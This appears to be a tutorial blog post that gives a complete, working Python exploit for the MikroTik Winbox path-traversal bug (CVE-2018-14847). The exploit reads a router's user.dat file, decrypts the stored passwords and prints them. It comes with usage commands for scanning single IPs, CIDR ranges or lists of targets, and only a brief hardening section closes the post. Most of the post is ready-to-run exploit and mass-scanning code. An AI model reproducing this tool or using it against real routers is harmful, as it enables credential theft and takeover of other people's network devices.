How to hack a MikroTik router (Winbox credential dump) — and how to prevent it



Today's topic: how to exploit a MikroTik router's Winbox service, and how to prevent it, using Python. The script below connects to Winbox (TCP 8291 by default), sends a file-open request whose file name is a `../../..` path traversal ending in `/flash/rw/store/user.dat` (the RouterOS user database — you can read the path straight out of the `hello` byte table: 0x2f is `/`, 0x2e is `.`), reads the file back, and decodes the credentials stored in it. This appears to correspond to the publicly documented Winbox directory-traversal bug (tracked as CVE-2018-14847) that MikroTik fixed in the RouterOS 6.42.x line — check MikroTik's advisory for the exact affected versions. Only run this against routers you own or are explicitly authorized to test: pulling credentials off someone else's device is a crime in most jurisdictions. You need Python 3 installed to run it.


If you are a Windows user, install Python 3 from
https://www.python.org/downloads/
Download the installer and run it like any other application (tick "Add Python to PATH" so `python` and `pip` are available from the command line).


If you are an Ubuntu/Debian user, run the following commands (as root, or prefixed with `sudo`) to install Python 3:

$ sudo apt-get install python3

After installing Python 3, install the Python package manager pip with:

$ sudo apt-get install python3-pip

If you are a macOS user, install Homebrew first and then Python 3. Note that the `ruby -e` one-liner below is Homebrew's retired installer; the current one is `/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"`. Either way you are piping a script fetched over the network straight into an interpreter — download it, read it, and only then run it.

$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

export PATH=/usr/local/bin:/usr/local/sbin:$PATH

$ brew install python3


After Python 3 and pip are installed for your OS, install the one third-party package the scanner actually needs — `ipcalc`, used to expand CIDR ranges into individual addresses:

$ pip3 install ipcalc

(`requests` is also imported but never used; it is only needed if you uncomment the ip-api geolocation lookup inside the script, which would send every target IP to a third-party service.)

Then create a file named "loop.py" containing the following script:

#code start
#!/usr/bin/env python3
import socket
import sys
from extract_user import dump
import ipcalc
import hashlib
import requests
import optparse
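# NOTE: this tool reads the credential store of a MikroTik router.  Use it
# only on devices you own or are explicitly authorized to test.

# --- Winbox wire format ---------------------------------------------------
# Both requests are M2-framed Winbox messages (the 0x4d 0x32 == "M2" bytes).
# `hello` asks the service to open a file: from offset 24 it carries a
# 0x35-byte path made of 0x2f ("/") and 0x2e (".") runs followed by
# "flash/rw/store/user.dat", i.e. a "/////./..//////./../..." traversal up
# to the RouterOS user database.  `getData` then reads from the handle the
# router returned in its reply (reply byte 38 is copied into request byte 19
# in _probe).  The offsets are protocol-specific and were kept verbatim from
# the original script; do not change them casually.
hello = bytes([0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
               0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
               0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
               0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
               0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
               0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
               0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
               0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
               0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
               0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
               0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
               0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
               0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
               0x00, 0x00])
getData = bytes([0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
                 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
                 0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
                 0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
                 0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
                 0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
                 0x00, 0x02, 0x00, 0x00, 0x00])

DEFAULT_PORT = 8291         # Winbox service port
SOCKET_TIMEOUT = 1          # seconds, for connect and every recv
REPLY_LIMIT = 64 * 1024     # upper bound on bytes accepted for one user.dat reply


def _parse_args(argv):
    """Parse the command line.

    Returns ``(options, positional)``.  ``options.fileName`` and
    ``options.port`` are the literal string "empty" when the flag is absent
    (kept for compatibility with the original flag handling).
    """
    parser = optparse.OptionParser(usage="%prog [-p PORT] (-f FILE | TARGET)")
    parser.add_option('-f', '--fileName', action="store", dest="fileName",
                      help="enter text file", default="empty")
    parser.add_option('-p', '--port', action="store", dest="port",
                      help="enter different port number", default="empty")
    return parser.parse_args(argv)


def _load_targets(options, positional):
    """Return the list of target addresses as strings.

    With ``-f`` every non-blank line of the file is one target.  Otherwise
    the first positional argument is expanded as a single IP or a CIDR
    network via ipcalc.  Raises SystemExit with a usage line when neither
    is supplied (the original indexed sys.argv[1] and crashed with
    IndexError, and broke when ``-p`` came before the target).
    """
    if options.fileName != "empty":
        with open(options.fileName, "r") as handle:
            return [line.strip() for line in handle if line.strip()]
    if not positional:
        raise SystemExit("usage: loop.py [-p PORT] (-f FILE | TARGET)")
    return [str(address) for address in ipcalc.Network(positional[0])]


def _recv_reply(sock):
    """Read one reply until the peer closes, a read times out, or
    REPLY_LIMIT bytes have been collected.

    A timeout before *any* data arrives is an error and is re-raised as
    socket.timeout; a timeout after some data simply ends the read (the
    router keeps the connection open after answering).  The original single
    ``recv(1024)`` silently truncated user databases longer than 1 KiB.
    """
    chunks = []
    received = 0
    while received < REPLY_LIMIT:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            if not chunks:
                raise
            break
        if not chunk:
            break
        chunks.append(chunk)
        received += len(chunk)
    return b"".join(chunks)


def _probe(ip, port):
    """Fetch user.dat from one router and print whatever credentials it holds.

    Socket errors and a too-short open reply (IndexError on byte 38)
    propagate to the caller, which maps them to one-line statuses.  The
    socket is closed on every path.
    """
    with socket.create_connection((ip, port), timeout=SOCKET_TIMEOUT) as sock:
        sock.sendall(hello)
        greeting = sock.recv(1024)
        request = bytearray(getData)
        # Copy the handle/session id the router assigned into the read request.
        request[19] = greeting[38]
        sock.sendall(request)
        reply = _recv_reply(sock)
    print(ip, ' ', end='')
    # Skip the reply header; the 55-byte offset is kept from the original.
    dump(reply[55:])


def main(argv=None):
    """Entry point: probe every target and print a status or the dumped users."""
    options, positional = _parse_args(sys.argv[1:] if argv is None else argv)
    if options.port == "empty":
        port = DEFAULT_PORT
    else:
        try:
            port = int(options.port)
        except ValueError:
            raise SystemExit("invalid port: %r" % options.port) from None
    for ip in _load_targets(options, positional):
        try:
            _probe(ip, port)
        except socket.timeout:
            print(ip, ": Connection Timeout")
        except ConnectionRefusedError:
            print(ip, ": Connection Refused")
        except ConnectionResetError:
            print(ip, ": Connection Reset")
        except IndexError:
            print(ip, ": Index Error")
        except socket.error:
            print(ip, ": Socket Error")


if __name__ == "__main__":
    main()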
# code ended


Then create a second file named "extract_user.py" in the same directory (loop.py imports `dump` from it) with the code below:


#code start here
#!/usr/bin/env python3
import sys, hashlib
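def decrypt_password(user, pass_enc):
    """Undo the XOR obfuscation applied to a password field in user.dat.

    The keystream is ``MD5(user || b"283i4jfkai3389")`` (16 bytes) repeated
    cyclically over the ciphertext — obfuscation, not encryption: anyone with
    the user name can reverse it.

    Args:
        user: the user name as bytes/bytearray; a ``str`` is accepted and
            UTF-8 encoded for convenience.
        pass_enc: the raw password field bytes.

    Returns:
        The password as a ``str``, cut at the first NUL byte.  Each byte is
        mapped 1:1 to a code point (latin-1), matching the original
        ``chr()`` loop; non-ASCII bytes are not UTF-8 decoded.
    """
    if isinstance(user, str):
        user = user.encode("utf-8")
    key = hashlib.md5(bytes(user) + b"283i4jfkai3389").digest()
    plain = bytes(byte ^ key[i % len(key)] for i, byte in enumerate(pass_enc))
    return plain.split(b"\x00")[0].decode("latin-1")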
def extract_user_pass_from_entry(entry):
    """Pull the raw user-name and password fields out of one user.dat record.

    Each field sits behind a 4-byte tag (``01 00 00 21`` for the name,
    ``11 00 00 21`` for the password) and is length-prefixed by one byte.
    Only the first occurrence of each tag is honoured.

    Returns ``(username_bytes, password_bytes)``; raises IndexError when a
    tag is missing or the field is truncated (callers rely on that).
    """
    def field_after(tag):
        # split()[1] deliberately raises IndexError when the tag is absent.
        body = entry.split(tag)[1]
        length = body[0]
        return body[1:1 + length]

    return field_after(b"\x01\x00\x00\x21"), field_after(b"\x11\x00\x00\x21")
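def get_pair(data):
    """Return ``[(user, password), ...]`` for every record in a user.dat blob.

    Records are delimited by the ``b"M2"`` frame marker; whatever precedes
    the first marker is discarded.  A record whose tags are missing or
    truncated is skipped.  A record whose user name is not ASCII is kept as
    ``("cannot decode", "cannot decode")`` so the caller can see it exists.

    Args:
        data: bytes or bytearray (loop.py passes a bytearray slice).
    """
    user_list = []
    for entry in data.split(b"M2")[1:]:
        try:
            user, pass_encrypted = extract_user_pass_from_entry(entry)
            pass_plain = decrypt_password(user, pass_encrypted)
            user = user.decode("ascii")
        except UnicodeDecodeError:
            user = pass_plain = "cannot decode"
        except (IndexError, ValueError):
            # Not a user record (tag missing / field cut short); the original
            # used a bare ``except`` here, which also swallowed Ctrl-C.
            continue
        user_list.append((user, pass_plain))
    return user_list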
def dump(data):
    """Print every credential pair recovered from *data* to stdout.

    Each pair is preceded by a blank line and followed by a separator once
    all pairs are printed; when nothing could be parsed the message
    ``: Unknown Sessionid`` is printed instead (the caller has already
    printed the target address on the same line).
    """
    pairs = get_pair(data)
    for name, secret in pairs:
        print('\n')
        print("User:", name)
        print("Pass:", secret)
    if not pairs:
        print(': Unknown Sessionid')
        return
    print("------------------")
# code end here

How to use (run from the directory that holds both loop.py and extract_user.py)

Scan a single IP:

$ python3 loop.py 192.168.1.10

Scan with a different Winbox port (keep the target before `-p`: the script takes the target from the first command-line argument):
$ python3 loop.py 192.168.1.10 -p 8282

Scan a range of IPs (CIDR notation, expanded by ipcalc):
$ python3 loop.py 192.168.1.0/24

Scan a list of IPs read from a file (one address per line):
$ python3 loop.py -f list.txt

How to protect your router from hacking and exploitation

1. Update RouterOS to a release that fixes the Winbox traversal bug (see MikroTik's advisory; any currently supported release is fine) and limit Winbox access to trusted source addresses, e.g. `/ip service set winbox address=192.168.88.0/24`. Because this attack reads the stored user database, assume credentials were already taken on any router that was exposed: change every user's password after updating.

2. Apply this firewall filter rule. It must be placed above any rule that accepts input traffic, and `wan` must be the real name of your WAN interface (use `in-interface-list=WAN` if you manage interfaces via lists):
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop



